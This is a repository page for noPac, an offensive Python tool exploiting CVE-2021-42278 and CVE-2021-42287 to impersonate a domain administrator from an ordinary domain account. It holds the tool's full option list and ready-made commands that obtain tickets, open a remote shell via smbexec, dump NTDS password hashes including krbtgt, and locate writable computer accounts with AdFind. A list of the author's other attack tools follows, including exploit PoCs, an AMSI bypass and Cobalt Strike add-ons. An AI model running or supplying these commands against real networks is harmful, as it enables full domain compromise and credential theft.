• Stars
    star
    567
  • Rank 78,634 (Top 2 %)
  • Language
    Python
  • Created almost 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

About

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Changed from sam-the-admin.

Usage

SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain

positional arguments:
  [domain/]username[:password]
                        Account used to authenticate to DC.

options:
  -h, --help            show this help message and exit
  --impersonate IMPERSONATE
                        target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to
                        the SPN specified
  -domain-netbios NETBIOSNAME
                        Domain NetBIOS name. Required if the DC has multiple domains.
  -target-name NEWNAME  Target computer name, if not specified, will be random generated.
  -new-pass PASSWORD    Add new computer password, if not specified, will be random generated.
  -old-pass PASSWORD    Target computer password, use if you know the password of the target you input with -target-name.
  -old-hash LMHASH:NTHASH
                        Target computer hashes, use if you know the hash of the target you input with -target-name.
  -debug                Turn DEBUG output ON
  -ts                   Adds timestamp to every logging output
  -shell                Drop a shell via smbexec
  -no-add               Forcibly change the password of the target computer.
  -create-child         Current account have permission to CreateChild.
  -dump                 Dump Hashs via secretsdump
  -spn SPN              Specify the SPN for the ticket (Default: cifs)
  -use-ldap             Use LDAP instead of LDAPS

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the
                        command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
  -dc-ip ip             IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used

execute options:
  -port [destination port]
                        Destination port to connect to SMB Server
  -mode {SHARE,SERVER}  mode to use (default SHARE, SERVER needs root!)
  -share SHARE          share where the output will be grabbed from (default ADMIN$)
  -shell-type {cmd,powershell}
                        choose a command processor for the semi-interactive shell
  -codec CODEC          Sets encoding used (codec) from the target's output (default "GBK").
  -service-name service_name
                        The name of theservice used to trigger the payload

dump options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state
  -use-vss              Use the VSS method insead of default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using -use-vss). Default: smbexec

Note: If -host-name is not specified, the tool will automatically get the domain control hostname, please select the hostname of the host specified by -dc-ip. If --impersonate is not specified, the tool will randomly choose a doamin admin to exploit. Use ldaps by default, if you get ssl error, try add -use-ldap .

GetST

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203

Auto get shell

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator 

Dump hash

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt

Scanner

python scanner.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203

MAQ = 0

Method 1

Find the computer that can be modified by the current user.

AdFind.exe -sc getacls -sddlfilter ;;"[WRT PROP]";;computer;domain\user  -recmute

Exp: add -no-add and target with -target-name.

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -no-add -target-name DomainWin7$ -old-hash :2a99c4a3bd5d30fc94f22bf7403ceb1a -shell

Warning!! Do not modify the password of the computer in the domain through ldaps or samr, it may break the trust relationship between the computer and the primary domain !!

Method 2

Find CreateChild account, and use the account to exploit.

AdFind.exe -sc getacls -sddlfilter ;;"[CR CHILD]";;computer; -recmute

Exp: add -create-child

python noPac.py cgdomain.com/venus:'1qaz@WSX' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -create-child

More Repositories

1

Intranet_Penetration_Tips

2018年初整理的一些内网渗透TIPS,后面更新的慢,所以整理出来希望跟小伙伴们一起更新维护~
4,089
star
2

CVE-2017-11882

CVE-2017-11882 from https://github.com/embedi/CVE-2017-11882
Python
531
star
3

Pentest

tools
C
524
star
4

Exchange2domain

CVE-2018-8581
Python
358
star
5

cve-2020-0688

cve-2020-0688
Python
315
star
6

acefile

POC of https://research.checkpoint.com/extracting-code-execution-from-winrar/
Python
270
star
7

CVE-2019-1040

CVE-2019-1040 with Exchange
Python
237
star
8

Mailget

通过脉脉用户猜测企业邮箱
Python
227
star
9

get_ip_by_ico

从shodan获取使用了相同favicon.ico的网站
Python
190
star
10

CVE-2018-15982_EXP

exp of CVE-2018-15982
Python
181
star
11

PySQLTools

Mssql利用工具
Python
165
star
12

RTF_11882_0802

PoC for CVE-2018-0802 And CVE-2017-11882
Python
164
star
13

owa_info

获取Exchange信息的小工具
Python
160
star
14

RelayX

NTLM relay test.
Python
156
star
15

CS_Chinese_support

Cobalt strike 修改支持回显中文。
145
star
16

MyJSRat

This is JSRat.ps1 in Python
Python
134
star
17

AMSI_bypass

XSLT
78
star
18

SharpAddDomainMachine

SharpAddDomainMachine
C#
68
star
19

proxyshell_payload

proxyshell payload generate
Python
67
star
20

cs_custom_404

Cobalt strike custom 404 page
HTML
61
star
21

GhostPotato

Just pick out the code we need.
Python
52
star
22

pyForgeCert

pyForgeCert is a Python equivalent of the ForgeCert.
Python
51
star
23

DomainHiding

external c2 use domainhiding.
Go
48
star
24

hackredis

Python
42
star
25

p12tool

A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.
Go
39
star
26

MSSQL_CLR

MSSQL CLR for pentest.
C#
35
star
27

CVE-2019-1040-dcpwn

CVE-2019-1040 with Kerberos delegation
Python
32
star
28

WebDAV

Set Up WebDAV Server for Remote File Sharing and more
Shell
31
star
29

warp_proxy

cloudflare socks5 server
Shell
31
star
30

atexec-pro

Fileless atexec, no more need for port 445
Python
29
star
31

tshtun

Py写的tsh的流量加解密过程。
C
25
star
32

xslt_poc

Execute codes From XSLT
XSLT
17
star
33

mousejack_replay

mousejack hack
Python
11
star
34

Python_Codes

some python codes
Python
9
star
35

Cortana

Some Cortana scripts
Ruby
3
star
36

comment

orz..
2
star
37

gitTun

GIt tun
Python
1
star
38

Ridter

1
star